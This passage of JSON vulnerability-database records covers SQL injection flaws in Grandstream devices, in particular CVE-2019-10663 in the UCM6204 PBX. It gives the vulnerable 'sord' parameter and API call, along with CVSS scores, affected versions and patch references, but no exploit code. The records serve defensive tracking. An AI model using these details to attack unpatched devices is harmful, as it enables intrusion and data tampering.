"date": "2015-07-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-04400"
},
{
"date": "2015-07-08T00:00:00",
"db": "VULHUB",
"id": "VHN-80827"
},
{
"date": "2015-07-07T00:00:00",
"db": "BID",
"id": "75580"
},
{
"date": "2015-07-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-003477"
},
{
"date": "2015-07-08T14:59:00.080000",
"db": "NVD",
"id": "CVE-2015-2866"
},
{
"date": "2015-07-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201507-191"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-07-07T00:00:00",
"db": "CERT/CC",
"id": "VU#253708"
},
{
"date": "2015-07-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-04400"
},
{
"date": "2017-09-03T00:00:00",
"db": "VULHUB",
"id": "VHN-80827"
},
{
"date": "2015-07-07T00:00:00",
"db": "BID",
"id": "75580"
},
{
"date": "2015-07-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-003477"
},
{
"date": "2017-09-03T01:29:01.577000",
"db": "NVD",
"id": "CVE-2015-2866"
},
{
"date": "2015-07-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201507-191"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201507-191"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream GXV3611_HD Camera SQL Injection Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-04400"
},
{
"db": "CNNVD",
"id": "CNNVD-201507-191"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201507-191"
}
],
"trust": 0.6
}
}
VAR-201903-1406
Vulnerability from variot - Updated: 2023-12-18 12:36Grandstream UCM6204 before 1.0.19.20 devices allow remote authenticated users to conduct SQL injection attacks via the sord parameter in a listCodeblueGroup API call to the /cgi? URI. Grandstream UCM6204 The device includes SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The GrandstreamUCM6204 is an IPPBX (PrivateBrancheXchange, dedicated switch) device from Grandstream. A SQL injection vulnerability exists in versions prior to GrandstreamUCM62041.0.19.20. This vulnerability stems from the lack of validation of external input SQL statements for database-based applications. An attacker could exploit this vulnerability to execute an illegal SQL command
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201903-1406",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ucm6204",
"scope": "lt",
"trust": 2.4,
"vendor": "grandstream",
"version": "1.0.19.20"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-14097"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002940"
},
{
"db": "NVD",
"id": "CVE-2019-10663"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6204_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.19.20",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6204:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10663"
}
]
},
"cve": "CVE-2019-10663",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-10663",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-14097",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-10663",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-10663",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2019-14097",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201903-1228",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-14097"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002940"
},
{
"db": "NVD",
"id": "CVE-2019-10663"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1228"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream UCM6204 before 1.0.19.20 devices allow remote authenticated users to conduct SQL injection attacks via the sord parameter in a listCodeblueGroup API call to the /cgi? URI. Grandstream UCM6204 The device includes SQL An injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The GrandstreamUCM6204 is an IPPBX (PrivateBrancheXchange, dedicated switch) device from Grandstream. A SQL injection vulnerability exists in versions prior to GrandstreamUCM62041.0.19.20. This vulnerability stems from the lack of validation of external input SQL statements for database-based applications. An attacker could exploit this vulnerability to execute an illegal SQL command",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-10663"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002940"
},
{
"db": "CNVD",
"id": "CNVD-2019-14097"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-10663",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002940",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-14097",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1228",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-14097"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002940"
},
{
"db": "NVD",
"id": "CVE-2019-10663"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1228"
}
]
},
"id": "VAR-201903-1406",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-14097"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-14097"
}
]
},
"last_update_date": "2023-12-18T12:36:17.811000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
},
{
"title": "Patch for the GrandstreamUCM6204SQL Injection Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/161129"
},
{
"title": "Grandstream UCM6204 SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=90912"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-14097"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002940"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1228"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002940"
},
{
"db": "NVD",
"id": "CVE-2019-10663"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920\u0026dl=1"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10663"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10663"
},
{
"trust": 0.6,
"url": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=23920\u0026dl;=1"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-14097"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002940"
},
{
"db": "NVD",
"id": "CVE-2019-10663"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1228"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-14097"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002940"
},
{
"db": "NVD",
"id": "CVE-2019-10663"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1228"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-05-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-14097"
},
{
"date": "2019-04-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002940"
},
{
"date": "2019-03-30T17:29:00.713000",
"db": "NVD",
"id": "CVE-2019-10663"
},
{
"date": "2019-03-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1228"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-05-14T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-14097"
},
{
"date": "2019-04-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002940"
},
{
"date": "2019-04-01T18:56:56.790000",
"db": "NVD",
"id": "CVE-2019-10663"
},
{
"date": "2019-04-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201903-1228"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1228"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream UCM6204 SQL Injection Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-14097"
},
{
"db": "CNNVD",
"id": "CNNVD-201903-1228"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201903-1228"
}
],
"trust": 0.6
}
}